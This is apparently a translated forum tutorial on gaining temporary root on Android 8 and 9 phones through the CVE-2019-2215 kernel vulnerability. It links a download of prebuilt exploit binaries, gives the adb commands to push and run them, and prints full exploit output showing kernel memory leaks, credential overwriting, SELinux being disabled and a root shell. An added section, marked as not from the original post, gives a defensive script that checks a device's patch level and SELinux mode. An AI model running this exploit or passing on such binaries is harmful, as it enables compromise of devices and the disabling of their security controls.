Root method
CVE-2019-2215 is an Android kernel vulnerability affecting Android 8.0, 8.1 and 9.0. Specifically, the following Android versions are affected:
Android 8.0
Android 8.1
Android 9
In principle this vulnerability can be used on Android 8 and 9, and in theory it works regardless of the bootloader (BL) lock, gaining root through privilege escalation. This root is only temporary, however: it is gone as soon as the phone reboots. It is still enough for some operations that normally need elevated privileges, and it can be used to extract the boot image and flash Magisk to make root permanent. The precondition for that is an already unlocked bootloader, otherwise it is very easy to brick the device; of course there may be individual models where flashing without unlocking does no harm.
#[Original tutorial] Flashing Magisk onto another phone from a phone without root#
File package: https://wwrx.lanzoum.com/iPUEb138zhaf
Procedure:
1. Use the privilege escalation vulnerability to obtain temporary root. First, push the two executables su98 and su98k to the device with adb. After unpacking the package, open a terminal or PowerShell in that directory (or adjust the paths in the commands yourself; path issues are not explained again below) and run:
adb push ./su98 /data/local/tmp
adb push ./su98k /data/local/tmp
Then we need to grant execute permission. Commands run inside adb shell are prefixed with > below:
adb shell
> cd /data/local/tmp
> chmod 775 *
Once the permissions are set, run su98 first:
> ./su98
Below is the output produced during the run; yours may differ. When a # prompt appears after it finishes, you have obtained pseudo-root (root without SELinux disabled):
R5:/data/local/tmp $ ./su98
MAIN: detected kernel version 3
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: soon will be calling WRITEV
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: initial portion length 0x12000
CHILD: task_struct_ptr = 0xffffffc032d93fc0
CHILD: clobbering with extra leak structures
PARENT: clobbering at 0xffffffc0431202a0
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
PARENT: readv returns 69688, expected 69688
PARENT: clobbering test passed
CHILD: clobbered
PARENT: writev() returns 0x13008
PARENT: Reading leaked data
CHILD: task_struct_ptr = 0xffffffc015d30000
CHILD: Finished write to FIFO.
CHILD: wrote 69688
PARENT: leaking successful
MAIN: thread_info should be in stack
MAIN: parsing kernel stack to find thread_info
PARENT: soon will be calling WRITEV
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: initial portion length 0x12000
CHILD: task_struct_ptr = 0xffffffc032d93fc0
CHILD: clobbering with extra leak structures
PARENT: clobbering at 0xffffffc043120ea0
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
PARENT: readv returns 69688, expected 69688
PARENT: clobbering test passed
CHILD: clobbered
CHILD: extra leak
PARENT: writev() returns 0x17008
PARENT: Reading leaked data
CHILD: Finished write to FIFO.
PARENT: Reading extra leaked data
PARENT: leaking successful
MAIN: task_struct_ptr = ffffffc032d93fc0
MAIN: thread_info_ptr = ffffffc015d30000
MAIN: Clobbering addr_limit
PARENT: clobbering at 0xffffffc015d30008
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: wrote 69648
PARENT: readv returns 69648, expected 69648
PARENT: clobbering test passed
MAIN: thread_info = 0xffffffc015d30000
MAIN: should have stable kernel R/W now
MAIN: searching for cred offset in task_struct
MAIN: search_base = ffffffc000000000
MAIN: searching for selinux_enforcing
MAIN: searching for kallsyms format strings
MAIN: **partial failure** cannnot fix kallsyms format string
MAIN: searching for kallsyms table
MAIN: kallsyms names start at 0xffffffc000f5a900 and have 129536 entries
MAIN: kallsyms names end at 0xffffffc001057900
MAIN: direct search didn't work, so searching via avc_denied
MAIN: searching for kallsyms format strings
MAIN: **partial failure** cannnot fix kallsyms format string
MAIN: searching for kallsyms table
MAIN: setting root credentials with cred offset 670
MAIN: UID = 0
MAIN: enabling capabilities
MAIN: SECCOMP status 0
MAIN: **FAIL** did not find selinux_enforcing symbol
MAIN: re-joining init mount namespace
MAIN: rejoining init net namespace
MAIN: root privileges ready
MAIN: popping out root shell
R5:/data/local/tmp #
Next, from this pseudo-root shell, run su98k to disable SELinux and complete the privilege escalation:
> ./su98k
Below is the output after running it:
R5:/data/local/tmp # ./su98k
MAIN: detected kernel version 3
MAIN: starting exploit for devices with waitqueue at 0x98
PARENT: soon will be calling WRITEV
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: initial portion length 0x12000
CHILD: task_struct_ptr = 0x0
PARENT: writev() returns 0x13008
PARENT: Reading leaked data
CHILD: task_struct_ptr = 0x0
CHILD: Finished write to FIFO.
CHILD: **fail** problematic address pointer, e.g., 0
MAIN: **fail** retrying
PARENT: soon will be calling WRITEV
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: initial portion length 0x12000
CHILD: task_struct_ptr = 0xffffffc032d94c80
CHILD: clobbering with extra leak structures
PARENT: clobbering at 0xffffffc0331d0ca0
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
PARENT: readv returns 69688, expected 69688
PARENT: clobbering test passed
CHILD: clobbered
PARENT: writev() returns 0x13008
PARENT: Reading leaked data
CHILD: task_struct_ptr = 0xffffffc015cac000
CHILD: Finished write to FIFO.
CHILD: wrote 69688
PARENT: leaking successful
MAIN: took 1 tries but did it
MAIN: task_struct_ptr = ffffffc032d94c80
MAIN: stack = ffffffc015cac000
MAIN: Clobbering addr_limit
PARENT: clobbering at 0xffffffc015cac008
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
PARENT: readv returns 69648, expected 69648
PARENT: **fail** clobber value doesn't match: is 0 but should be abcddeadbeef1234
MAIN: **fail** retrying
PARENT: clobbering at 0xffffffc015cac008
CHILD: wrote 69648
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
PARENT: readv returns 69648, expected 69648
PARENT: clobbering test passed
MAIN: took 1 tries but did it
MAIN: thread_info = 0xffffffc015cac000
MAIN: should have stable kernel R/W now
MAIN: searching for cred offset in task_struct
MAIN: search_base = ffffffc000000000
MAIN: searching for selinux_enforcing
MAIN: searching for kallsyms table
CHILD: wrote 69648
MAIN: kallsyms names start at 0xffffffc000f5a900 and have 129536 entries
MAIN: kallsyms names end at 0xffffffc001057900
found symbol in kernel memory
MAIN: setting root credentials with cred offset 670
MAIN: UID = 0
MAIN: enabling capabilities
MAIN: SECCOMP status 0
MAIN: disabled selinux enforcing
MAIN: root privileges ready
MAIN: popping out root shell
R5:/data/local/tmp #
At this point we have full root privileges.
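As an added check that is not part of the original post: a POSIX sh script that judges, from two values a device reports, whether it is still exposed to CVE-2019-2215 and whether SELinux is still enforcing, the state that su98k's "disabled selinux enforcing" line above shows being switched off. It assumes the fix shipped with Android security patch level 2019-10-06 and reads the patch level via the `ro.build.version.security_patch` property; neither value comes from the post.

```shell
#!/bin/sh
# Added example, not from the original post: classify a device by its Android
# security patch level (fix for CVE-2019-2215 assumed at level 2019-10-06)
# and by the SELinux mode reported by `getenforce`.

FIX_PATCH_LEVEL="2019-10-06"   # assumed patch level carrying the fix

# Convert YYYY-MM-DD into a comparable integer YYYYMMDD; empty if malformed.
patch_to_int() {
    case "$1" in
        [0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9])
            printf '%s' "$1" | tr -d '-' ;;
        *)  printf '' ;;
    esac
}

# Print "vulnerable", "patched" or "unknown" for one patch level string.
assess_patch_level() {
    level=$(patch_to_int "$1")
    fix=$(patch_to_int "$FIX_PATCH_LEVEL")
    if [ -z "$level" ]; then
        echo "unknown"
    elif [ "$level" -lt "$fix" ]; then
        echo "vulnerable"
    else
        echo "patched"
    fi
}

# Combine the patch verdict with the SELinux mode. A device that should be
# Enforcing but reports Permissive matches the end state of a su98k run.
assess_device() {
    patch_state=$(assess_patch_level "$1")
    case "$2" in
        Enforcing)  sel="selinux-enforcing" ;;
        Permissive) sel="selinux-permissive" ;;
        *)          sel="selinux-unknown" ;;
    esac
    echo "$patch_state $sel"
}

# Stand-alone use against a connected device (adb output is CRLF-terminated).
if [ "${1:-}" = "--adb" ]; then
    assess_device "$(adb shell getprop ro.build.version.security_patch | tr -d '\r')" \
                  "$(adb shell getenforce | tr -d '\r')"
fi
```

Run it as `sh check.sh --adb` with a device attached; a result of `vulnerable selinux-permissive` on a stock build is the combination worth investigating.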
![Description](http://cdn.u1.huluxia.com/g4/M01/BD/23/rBAAdmS8bVWAPe6pAAEDLzVRomo883.jpg)
![Description](http://cdn.u1.huluxia.com/g4/M01/BD/23/rBAAdmS8bVaASeg0AAMjeYZYb1U545.jpg)
![Description](http://cdn.u1.huluxia.com/g4/M01/BD/23/rBAAdmS8bVeAZ_-yAAFkcO5CLAM176.jpg)
Article URL: https://www.sjxi.cn/detil/33ce3cbd5c7f4240bf675c9583dc33b0